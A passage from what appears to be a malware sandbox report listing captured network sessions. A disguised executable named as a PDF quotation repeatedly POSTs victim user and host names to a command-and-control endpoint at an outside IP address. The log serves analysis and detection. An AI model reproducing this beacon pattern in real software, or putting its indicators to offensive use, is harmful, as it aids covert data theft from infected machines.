                                                                                    Date: Tue, 07 Jan 2025 11:33:16 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    82192.168.2.44996294.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:16.678096056 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:16.682924986 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:17.415369034 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:17 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    83192.168.2.44996894.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:17.561273098 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:17.566164017 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:18.317682028 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:18 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    84192.168.2.44997494.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:18.609121084 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:18.615544081 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:19.383115053 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:19 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    85192.168.2.44998594.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:19.532592058 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:19.538604021 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:20.261940002 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:20 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    86192.168.2.44999194.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:20.410084963 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:20.414906025 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:21.160782099 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:21 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    87192.168.2.44999794.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:21.325269938 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:21.330904961 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:22.097130060 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:21 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    88192.168.2.45000394.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:22.249197006 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:22.254057884 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:22.988300085 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:22 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    89192.168.2.45001094.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:23.156584024 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:23.161672115 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:23.905446053 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:23 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    90192.168.2.45001994.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:24.047564983 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:24.052351952 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:24.784308910 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:24 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    91192.168.2.45002694.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:24.964627981 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:24.970591068 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:25.726171970 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:25 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    92192.168.2.45003294.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:25.880321026 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:25.885204077 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:26.611114979 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:26 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    93192.168.2.45003894.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:26.766432047 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:26.771342993 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:27.494731903 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:27 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    94192.168.2.45004594.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:27.673785925 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:27.680963993 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:28.405051947 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:28 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    95192.168.2.45005494.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:28.559421062 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:28.568840027 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:29.321559906 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:29 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    96192.168.2.45006094.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:29.469875097 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:29.482590914 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:30.200114965 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:30 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    97192.168.2.45006794.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:30.413436890 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:30.418199062 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:31.133711100 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:31 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    98192.168.2.45007394.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:31.278424025 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:31.283217907 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:32.021081924 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:31 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    99192.168.2.45007994.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:32.178493023 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:33:32.183439016 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:33:32.920279026 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:33:32 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    100192.168.2.45008694.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:33:33.059987068 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
